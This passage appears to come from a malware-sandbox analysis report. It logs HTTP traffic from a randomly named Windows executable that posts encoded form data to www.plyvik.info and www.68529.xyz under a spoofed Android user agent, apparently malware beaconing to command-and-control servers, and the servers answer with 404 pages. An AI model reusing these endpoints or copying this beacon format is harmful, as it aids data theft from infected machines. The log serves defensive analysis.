74 30 3d Data Ascii: NbcPAHe=mlNjiykzFjkbHtOR2R+Jk0D7hTcUohz8xcA8+YI9k7FVKeO4+N/M2x2Y6zZzAuXcTJmMk6BQDNtb8Ebk8DngXF2LIzZYKEEXE1OJ8sGk4uVpANwsjTxHSdeGQLyOEfzTy1VNUNktG7NPifs+po/R4mFZjjzYedPmqO0vh+1KfRP2yTGyWPJILHsDGap3+NuL+b2mVH1SdFc6ruRs4+bd+t0=
Nov 7, 2024 08:11:30.103487015 CET	533	IN	HTTP/1.1 404 Not Found Date: Thu, 07 Nov 2024 07:11:30 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Nov 7, 2024 08:11:30.386950970 CET	533	IN	HTTP/1.1 404 Not Found Date: Thu, 07 Nov 2024 07:11:30 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	50037	67.223.117.142	80	4544	C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 08:11:32.024621010 CET	10777	OUT	POST /ak8m/ HTTP/1.1 Host: www.plyvik.info Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.plyvik.info Referer: http://www.plyvik.info/ak8m/ Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 10304 User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36 Data Raw: 4e 62 63 50 41 48 65 3d 6d 6c 4e 6a 69 79 6b 7a 46 6a 6b 62 48 74 4f 52 32 52 2b 4a 6b 30 44 37 68 54 63 55 6f 68 7a 38 78 63 41 38 2b 59 49 39 6b 37 4e 56 4a 72 53 34 38 74 44 4d 33 78 32 59 30 54 5a 75 41 75 58 37 54 49 4f 49 6b 36 64 6d 44 50 6c 62 2b 6e 6a 6b 2b 79 6e 67 5a 46 32 4c 45 54 5a 5a 53 6b 45 34 45 31 65 4e 38 74 32 6b 34 75 56 70 41 4c 30 73 33 57 46 48 51 64 65 46 59 72 79 61 54 76 79 47 79 31 63 36 55 4e 77 58 48 4c 74 50 6a 2f 63 2b 79 36 6e 52 33 6d 46 68 7a 7a 79 64 65 64 43 68 71 50 5a 51 68 2b 41 52 66 54 54 32 32 46 44 6c 43 50 42 6f 58 32 55 4a 59 73 68 2f 32 2f 32 78 6d 37 4b 54 62 48 4e 4d 4c 46 41 4b 70 2b 77 51 76 62 66 77 6c 4b 68 35 34 6c 72 48 76 5a 59 31 4c 54 36 48 58 6b 31 75 50 57 64 33 79 68 50 71 61 64 63 63 51 6c 32 69 38 57 70 56 66 50 66 4f 58 6e 71 31 36 42 48 6c 39 67 34 68 6e 38 34 71 69 61 4c 49 30 38 6a 71 5a 43 62 36 54 54 2f 58 6e 59 35 65 4b 70 54 55 70 63 58 65 52 6c 44 50 59 6d 69 4e 72 73 4d 33 4f 51 64 43 2b 6e 67 34 54 52 62 75 78 46 79 7a 43 5a [TRUNCATED] Data Ascii: NbcPAHe=mlNjiykzFjkbHtOR2R+Jk0D7hTcUohz8xcA8+YI9k7NVJrS48tDM3x2Y0TZuAuX7TIOIk6dmDPlb+njk+yngZF2LETZZSkE4E1eN8t2k4uVpAL0s3WFHQdeFYryaTvyGy1c6UNwXHLtPj/c+y6nR3mFhzzydedChqPZQh+ARfTT22FDlCPBoX2UJYsh/2/2xm7KTbHNMLFAKp+wQvbfwlKh54lrHvZY1LT6HXk1uPWd3yhPqadccQl2i8WpVfPfOXnq16BHl9g4hn84qiaLI08jqZCb6TT/XnY5eKpTUpcXeRlDPYmiNrsM3OQdC+ng4TRbuxFyzCZladAimtnLKc8kKao9+YLbe3tcjVDifKSgs6lFPRp8C3WceFfrZJBWq/TBuxnZmD3aWajh2b9mLuF9zqDPW6WGwDHReE/2I7FlFWGNhI/9kODnngdbdSCtTj9V97IkupEk1AyLTZCu4p0GljXnLNnNvSh4aZXP66uY5ZefR3b+SixSNX57eDD2zHe0bEJIswYdJ2r7Ba9li4A66zJwK8z7cHN+WMZ3lrbUk9pMaj4dAZtWir57EUgFm1KMO16yUY5wUUCtg0Tw/q+xdHFpX2Yt0XAnKgwDp7Le2UZVeCZtHWqNhFFLN5y7gjiOm9F3zixoIILUTQ/WPY0IUpjRSY4h9aJkDvF8eA3fkkZtmUpiyara9Fp6clKWUtZRiuK+m4mCNFURo0IqI62s4MBdwhhjvPsBejGgH5It9vDLsZtmqnnV5rbIsjRH1cubzijbgrOTFI5mWtlT1ZQU7BeNmJWMEL+FHLQK/95QM3CAE5eXQy1Tw5LFlEdenCXYlGZX6abqprjL9rvzUxqyRXTVeXp/EsMUbdeX0Mc+P+i5iYiWNOorYSFdz4us8673n4fGGSn8PekQSrrboU0pPAmcDb0xBvZAtE/Mrhu6+lO4V8ZcXCZ6lUPIA2+M9rF5ChUTDDUlFhGTd35JSx+meKvrZHvW7xnZxCNVeCj0x [TRUNCATED]
Nov 7, 2024 08:11:32.660830975 CET	533	IN	HTTP/1.1 404 Not Found Date: Thu, 07 Nov 2024 07:11:32 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	50038	67.223.117.142	80	4544	C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 08:11:34.617461920 CET	406	OUT	GET /ak8m/?NbcPAHe=rnlDhCsdJ2ooBNmS/2ryiUnDiA99hEPBnoEBgto8r48ZfNeG/PnUuRGB6UxkEvrVIavN7L12K9gGymeMzCPkQmTcYjl3T3IxdHP3y6mI4eFVbYE62DRlQ7k=&9Pj=rz_D HTTP/1.1 Host: www.plyvik.info Accept: / Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Nov 7, 2024 08:11:35.283035994 CET	548	IN	HTTP/1.1 404 Not Found Date: Thu, 07 Nov 2024 07:11:35 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	50039	107.163.130.253	80	4544	C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 08:11:40.769463062 CET	669	OUT	POST /2su7/ HTTP/1.1 Host: www.68529.xyz Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.68529.xyz Referer: http://www.68529.xyz/2su7/ Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 204 User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36 Data Raw: 4e 62 63 50 41 48 65 3d 6b 59 4f 51 64 59 34 4e 6d 39 4e 31 4a 37 77 67 31 2b 70 32 45 36 6f 50 58 43 78 2f 75 57 4d 67 73 64 71 62 74 6d 69 4e 7a 55 51 58 64 43 7a 58 2f 45 4b 62 31 77 57 6f 57 41 7a 4e 79 59 74 51 53 46 64 7a 67 74 42 57 45 31 46 51 39 45 2b 4a 56 67 38 32 61 53 70 2f 68 52 48 66 48 31 39 39 72 70 36 59 50 47 44 79 36 31 7a 67 4f 39 74 64 65 46 56 39 66 6b 71 6d 37 72 57 6b 75 74 54 58 7a 30 6b 32 65 37 50 46 79 6f 57 4a 47 33 63 33 68 6f 48 50 48 31 68 37 58 78 59 6b 56 4e 36 31 42 57 32 70 47 46 46 50 57 46 46 6b 55 2b 66 6a 73 43 61 67 32 4e 47 63 58 43 44 45 6f 7a 76 61 52 41 3d 3d Data Ascii: NbcPAHe=kYOQdY4Nm9N1J7wg1+p2E6oPXCx/uWMgsdqbtmiNzUQXdCzX/EKb1wWoWAzNyYtQSFdzgtBWE1FQ9E+JVg82aSp/hRHfH199rp6YPGDy61zgO9tdeFV9fkqm7rWkutTXz0k2e7PFyoWJG3c3hoHPH1h7XxYkVN61BW2pGFFPWFFkU+fjsCag2NGcXCDEozvaRA==
Nov 7, 2024 08:11:41.721214056 CET	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 07 Nov 2024 07:11:41 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	50040	107.163.130.253	80	4544	C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 08:11:43.317460060 CET	689	OUT	POST /2su7/ HTTP/1.1 Host: www.68529.xyz Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.68529.xyz Referer: http://www.68529.xyz/2su7/ Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 224 User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36 Data Raw: 4e 62 63 50 41 48 65 3d 6b 59 4f 51 64 59 34 4e 6d 39 4e 31 49 62 41 67 7a 5a 64 32 43 61 6f 4d 59 69 78 2f 67 32 4d 6b 73 64 6d 62 74 6b 50 57 7a 6d 30 58 64 6e 58 58 2b 41 57 62 32 77 57 6f 5a 67 79 6d 38 34 74 66 53 46 42 42 67 6f 70 57 45 31 35 51 39 47 32 4a 57 54 45 35 49 79 70 39 71 78 48 5a 4a 56 39 39 72 70 36 59 50 47 48 59 36 31 72 67 4f 50 35 64 52 45 56 2b 53 45 71 70 7a 4c 57 6b 71 74 54 54 7a 30 6c 54 65 2b 7a 2f 79 73 6d 4a 47 79 77 33 34 5a 48 4d 4f 31 68 35 54 78 5a 6d 57 66 72 41 47 31 48 41 4d 6d 52 51 54 57 63 46 63 59 53 35 39 7a 37 33 6b 4e 69 76 4b 46 4b 77 6c 77 53 54 4b 49 4a 4c 79 6c 53 42 63 4e 6e 4c 56 68 6a 4a 77 48 5a 38 61 61 41 3d Data Ascii: NbcPAHe=kYOQdY4Nm9N1IbAgzZd2CaoMYix/g2MksdmbtkPWzm0XdnXX+AWb2wWoZgym84tfSFBBgopWE15Q9G2JWTE5Iyp9qxHZJV99rp6YPGHY61rgOP5dREV+SEqpzLWkqtTTz0lTe+z/ysmJGyw34ZHMO1h5TxZmWfrAG1HAMmRQTWcFcYS59z73kNivKFKwlwSTKIJLylSBcNnLVhjJwHZ8aaA=
Nov 7, 2024 08:11:44.249499083 CET	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 07 Nov 2024 07:11:44 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port
39	192.168.2.4	50041	107.163.130.253	80

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 08:11:46.210450888 CET	10771	OUT	POST /2su7/ HTTP/1.1 Host: www.68529.xyz Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.68529.xyz Referer: http://www.68529.xyz/2su7/ Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 10304 User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36 Data Raw: 4e 62 63 50 41 48 65 3d 6b 59 4f 51 64 59 34 4e 6d 39 4e 31 49 62 41 67 7a 5a 64 32 43 61 6f 4d 59 69 78 2f 67 32 4d 6b 73 64 6d 62 74 6b 50 57 7a 6d 38 58 64 78 4c 58 2f 6e 69 62 33 77 57 6f 51 41 7a 42 38 34 74 34 53 46 59 4b 67 6f 6c 6f 45 77 39 51 39 6c 75 4a 64 43 45 35 52 43 70 39 6c 52 48 59 48 31 39 53 72 70 71 55 50 47 58 59 36 31 72 67 4f 50 56 64 57 56 56 2b 42 30 71 6d 37 72 57 67 75 74 53 45 7a 77 4a 6c 65 2f 6a 76 79 64 61 4a 47 53 67 33 36 4c 66 4d 50 56 68 2f 66 52 5a 45 57 66 6e 70 47 31 4c 71 4d 6e 56 32 54 51 67 46 5a 35 7a 76 76 78 50 32 31 39 69 69 66 46 47 50 70 42 32 42 4e 71 6c 4d 37 41 4c 42 4b 4d 33 4a 54 7a 4b 56 72 6b 4a 62 59 39 44 7a 61 4e 4d 48 49 4b 71 49 49 51 6a 47 34 69 6e 31 6a 2f 6b 77 35 52 59 59 77 45 47 6e 41 39 41 52 47 65 44 53 36 37 69 53 6d 45 69 4c 4a 67 55 6c 6f 51 41 6a 36 51 4f 68 36 44 37 48 5a 6d 4b 55 6c 52 47 6e 54 79 56 43 6e 4a 4e 4a 61 51 6b 34 51 79 6a 42 2b 30 37 57 42 6e 35 5a 44 68 63 44 75 4a 73 51 49 6b 38 32 6b 77 55 71 5a 56 58 4c 66 49 [TRUNCATED] Data Ascii: NbcPAHe=kYOQdY4Nm9N1IbAgzZd2CaoMYix/g2MksdmbtkPWzm8XdxLX/nib3wWoQAzB84t4SFYKgoloEw9Q9luJdCE5RCp9lRHYH19SrpqUPGXY61rgOPVdWVV+B0qm7rWgutSEzwJle/jvydaJGSg36LfMPVh/fRZEWfnpG1LqMnV2TQgFZ5zvvxP219iifFGPpB2BNqlM7ALBKM3JTzKVrkJbY9DzaNMHIKqIIQjG4in1j/kw5RYYwEGnA9ARGeDS67iSmEiLJgUloQAj6QOh6D7HZmKUlRGnTyVCnJNJaQk4QyjB+07WBn5ZDhcDuJsQIk82kwUqZVXLfIbtfZDIV1u1KZ47dVoUUJlFj9EKL0fX2DferBdXXFezA/b26LpqzPIqThq0QmsMV0THtrvaHc/sqv2RS0WiwKXc/S9mjRQtTPHzWuwUYA0kpW384BUFJzOqoxCs6qnjXUzNeGXQwTOANqfP695E/MhbsQDyvOyEoQ6EDL4NeNjgi2dT+hJKIzcU0bQJvoCB+IWIiK+NZ3VxJnxdi3n7498e05uZsb5WefmUoUeLh+eCgGON1kvFz1vHAVAU3AWzkDOqj/2BH2gQshFT9wwmQpeflSP71tZpMlN00I5PByIi5tnWIR/7FZOIOajRYS4fD8CMrMx7C0V9LmiMifV0dBapUbzgufB8FIqI7Ao1drRQ+z4wLCGQ318Ns4NZaIMlATQosrkd5V4hRvPi+iFlNi5lgR8u94Lf9xBBTSjOj9a5ZF1TqcTooSffHMkhV4T8JuWr83W1Jappnnho2M2wRFuSTT2ouhyGftyX+Mq13DBFrm0t9C479Zn3tQjpPGfsD4utyGourenZyRrc7i2c9jiz0B/VGXV2eOAA3iUXvoc83LOcbeqNKqYLIhfJwdUmAmkWZXBxnU9tdOjc7tKLGzDsZViZly3vuEO/VTVaGsiJIYH5btybbjKvO3r4aDyrwO/zbWMBHacSRyz27tVQvlVxTa+Mtfx6kar5 [TRUNCATED]
Nov 7, 2024 08:11:47.155010939 CET	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 07 Nov 2024 07:11:47 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Target ID:	0
Start time:	02:08:37
Start date:	07/11/2024
